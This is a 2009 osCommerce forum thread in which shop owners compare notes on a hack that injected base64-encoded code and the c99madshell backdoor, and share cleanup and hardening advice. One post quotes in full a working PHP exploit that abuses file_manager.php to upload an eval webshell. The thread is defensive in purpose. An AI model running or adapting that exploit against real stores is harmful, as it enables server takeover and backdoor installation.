154 replies to this topic

[jfkafka]

Thanks for the links, Spooks, I looked at the 3rd one to backup the files and it was in spanish and says to put the backup file on the root (and being suddenly paranoid due to this base decode injection and how this person found my website which is still in development!), I'm wondering if this can be exploited by calling it in the browser for some nefarious purpose, especially cuz I no comprende the spanish code- ah, guess thats what happens when you're violated, certainly has been a learning experience regarding security precautions

Nice work, Reiner, investigating this insidious code, I am hopeful that by removing the decode the rest of the file is intact or is there a possibility that something else is embedded in each file that I should be on the lookout for

here is a link to a good article regarding hacker minimizing steps
http://www.clubosc.com/hacked-oscommerce-e...al-reading.html

jk

[bradybarrows]

germ, on Sep 7 2009, 01:18 PM, said:

Folder permissions should NEVER be higher tha 755 - EVER.

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

Please note in the osCommerce 2.2 Milestone 2 Update 051112 Documentation on page 9:

Set the permissions on /catalog/images directory to 777.
Reset the permissions on /catalog/admin/includes/configure.php to 644.
Create the dir /catalog/admin/backups and set the permissions to 777.
Set the permissions on /catalog/admin/images/graphs directory to 777.

I followed the instructions that come with the above documentation and you say to change it.  Why doesn't the documentation explain what you are saying?  Will the documentation be updated with what you are saying now?

[bradybarrows]

spooks, on Sep 9 2009, 02:49 PM, said:

I don't know if its mentioned here already, I`ve not read through the whole thread, but its clear that this hack would have been prevented, by

1. Renaming the admin folder
2. Deleting File Manager from admin.

Both those security risks have been detailed here many times.

Regular backups are also essential:

Use AutoBackup Database in Admin  http://addons.oscommerce.com/info/2314
AND Database backup manager http://addons.oscommerce.com/info/5769
also Backup of all store files in zip format http://addons.oscommerce.com/info/6986

Aloha Sam,

This is the first time I read to DELETE the file manager from admin.  Can you give the step by step direction. I am assuming you mean the File Manager in the TOOLS section of the admin panel?  Step by step directions should be given for this one. I haven't a clue how to do this. That means that an integral part of the admin panel needs to be removed. By the way, why would this be necessary?  Why can't this feature be secure and other parts of the admin control panel are left?  Why pick out this particular feature and remove it?  

The way this hack has shown up in the past ten days or so seems to indicate a big deal, doesn't it?

[Weedwaka]

bradybarrows, on Sep 11 2009, 03:19 AM, said:

Aloha Sam,

This is the first time I read to DELETE the file manager from admin.  Can you give the step by step direction. I am assuming you mean the File Manager in the TOOLS section of the admin panel?  Step by step directions should be given for this one. I haven't a clue how to do this. That means that an integral part of the admin panel needs to be removed. By the way, why would this be necessary?  Why can't this feature be secure and other parts of the admin control panel are left?  Why pick out this particular feature and remove it?  

The way this hack has shown up in the past ten days or so seems to indicate a big deal, doesn't it?

I would like to delete the file manager also.

[Weedwaka]

Maybe someone could start a sticky with just information ( FACTS ONLY ) on this hack. Files to look for and known behavior .

I think many more people are going to be hit with this and will be coming here for help.

[Pipeloops]

Weedwaka, on Sep 11 2009, 04:44 AM, said:

I would like to delete the file manager also.

In the admin directoy delete or rename file_manager.php. If you choose to rename it, the safest is to make sure you rename the extension, so it is not a php file any more.
You should also rename your admin folder. If you do this, make sure you edit the configure.php file in the admin/includes folder. This file defines where the admin files are located and so contains references to the "admin" folder. These need to be changed to the new name. This should help to hide potentially vulnerable files from attackers.

BTW, I still have not figured out HOW the attacker got into my site, only that he managed to get into the file manager. I also have no idea yet what the sripts did when a user visited my store. But I must say this hack is pretty sophisticated, it installed both a backdoor for the hacker (c99madshell), and also sripts that get executed with every hit on your site.

[Pipeloops]

Pipeloops, on Sep 11 2009, 10:17 AM, said:

BTW, I still have not figured out HOW the attacker got into my site, only that he managed to get into the file manager. I also have no idea yet what the sripts did when a user visited my store. But I must say this hack is pretty sophisticated, it installed both a backdoor for the hacker (c99madshell), and also sripts that get executed with every hit on your site.

The "HOW" is clear now. Googeling for file_manager.php brought me to a security report for code injection into file_manager.php in osCOmmerce RC2.2a. No fix is known yet (other than renaming or deleting file_manager.php).

Here is the exploit:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
	echo '[~]No response from'.$host;
	die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

SO: DELETE OR RENAME THE FILE MANAGER!!!

[jfkafka]

In attempting to discover how this hacker found my site since it's relatively new, I wonder if it's by googling for the information in the footer either the oscommerce logo or "powered by oscommerce" which would have potentially identified my site, for now I'm going to remove that footer tag and logo, also have read some info on this c99madshell script- very sobering indeed, is it true that merely browsing to an infected site exposes the user to infiltration?!- I'm even wondering if this script is embedded in any oscommerce contributions!  I'm not sure if a contribution is scanned or sanitized or simply made available as is with the "use at your own risk" caveat- hopefully I'm just being unnecessarily concerned(read paranoid) as to the extent of this hacker script but I can envision how this code can spread its tentacles exponentially until it's not a virus, it's an internet plague!
I sincerely hope someone will chide me for this post and correct these irrational misgivings- cuz right now I am doing la freak!

jk

[images]

A client of ours had his site compromised on the 04 Sept at 19:00; almost the same time as a couple of you.

I found the extra files in:

/catalog/admin/includes/languages/english/images/buttons/

These were the same as blueflametuna execpt I did not find style.css.php.orig.

I have removed the file_mananger.php script - what negative effects will this have on using the admin?
Either way it's got to be better than being hacked again.

Thanks for all the useful information posted so far.

It would be useful to have a dedicated forum for security updates which you could then subscribe to. Unless there is already a security announcement list which I am not aware of?

[jfkafka]

In comparing an earlier copy of a site backup with the copy of the hacked site I noticed in the root directory of the hacked site was a jpeg with a name that looks kinda unusual and wasn't in the earlier backup copy of the site
the name of the jpeg was: -57x40.jpgs-57x40.jpgl-57x40, I didn't click on it so as not to disturb it-
I had added some contributions in between and am not sure if this is a legitimate name for a jpeg or something more sinister but thought I'd mention it in case it is connected with this hack or someone can explain what it's for...

jk

[robinwarren]

For noobies and those who are nervous about renaming or deleting /admin/file_manager.php :

The purpose of the File Manager is to let you edit any program or file within OSC, from within OSC itself. It is accessed through the Tools menu in the Admin area.

When you delete the file_manager.php program, its name will still appear in the Tools menu, but if you click on File Manager, the program will not be found. Once the program is gone, hackers will not be able to exploit it.

If you are in the habit of using the File Manager to make changes to your site, it's much safer to copy the file to your own system, save it with another name (in case your changes don't work), then get another copy of the file to modify. After you make changes, FTP it up to your OSC site. That way, if you ever have to reinstall from scratch (God forbid), you will have a backup on your own system of any files you have changed.

And you'll be safer from hackers.

[lindsayanng]

Flipping lovely.

I got hacked as well.. i found the various style.css.php and the little files that went along with it.. but does ANYONE know of an automated way to search and remove an entire line of code from a server??

I was thinking that using SSH access would work, but i am not familiar with the syntax for stuff like this. i figured out how to find and replace within an SSH session, but how do you find and DELETE within an entire directory?

Also, you guys should know that this is NOT JUST OSCOMMERCE.. they actually got into my website through wordpress.. LOTS of wordpress users have had this exact same hack..

So anyways.. no more SHOULD HAVE DONE and whos fault.. lets figure out how to fix and remove the code and how to close up the hole.

p.s. i had no filemanager.php file on my store.

[Weedwaka]

Eesh that is grim .

Someone has been working on this a long time.

[lindsayanng]

I freaking hate hackers.. but the sad thing is, someone WILL buy the hacked info.. they wouldnt do it if there wasnt a market for it..

[lindsayanng]

p.s. i found a guy who can use SSH to clean up your files for you.. I did MOST of it myself, and found the root, but clearning the files individually is NOT happening for me.

let me know if you need it

[robinwarren]

Has anyone noticed a severe server timeout problem that might be related to this hack?

We've had tons of timeouts since late August. The hack appeared and changed all the file dates on 9/4. (Unless it came along earlier and just kicked itself off on 9/4 ...) We've got everything cleaned and working fine (we think), but 3 techs have been unable to find a reason for the sudden timeouts.

Anyone else having this problem?

[lindsayanng]

i did read that this was probably injected earlier as a sleeper and then was waiting for a command.. do not know if it had to do with your timeouts though

[bradybarrows]

Pipeloops, on Sep 10 2009, 03:50 AM, said:

On further investigating the hack, I was able to decode the file s.php that it had put on the server. It actually needed gzinflate(base64_deoced(...)) 48 times, before the script appeared. What I got then was a well known hacker's tool, c99madshell, just google for it and you know its pretty dangerous. Don't know what the guy was up to on my site with this.

If you have been hacked by this, go and look for the additional .php files (s.php, dg.php, in my case also style.css.php) and DELETE them!!!

Reiner

I found the same files in my cart. I have deleted them and still looking for others and removing the code on each php page. I have not begun experiencing some problems with error codes after doing this.  I have shut my site down to the public while I am working on it. Obviously the same hacker.

[bradybarrows]

robinwarren, on Sep 11 2009, 06:27 PM, said:

Has anyone noticed a severe server timeout problem that might be related to this hack?

We've had tons of timeouts since late August. The hack appeared and changed all the file dates on 9/4. (Unless it came along earlier and just kicked itself off on 9/4 ...) We've got everything cleaned and working fine (we think), but 3 techs have been unable to find a reason for the sudden timeouts.

Anyone else having this problem?

All the files I removed had a 9/4 date.

[Weedwaka]

Mine were 9/4 also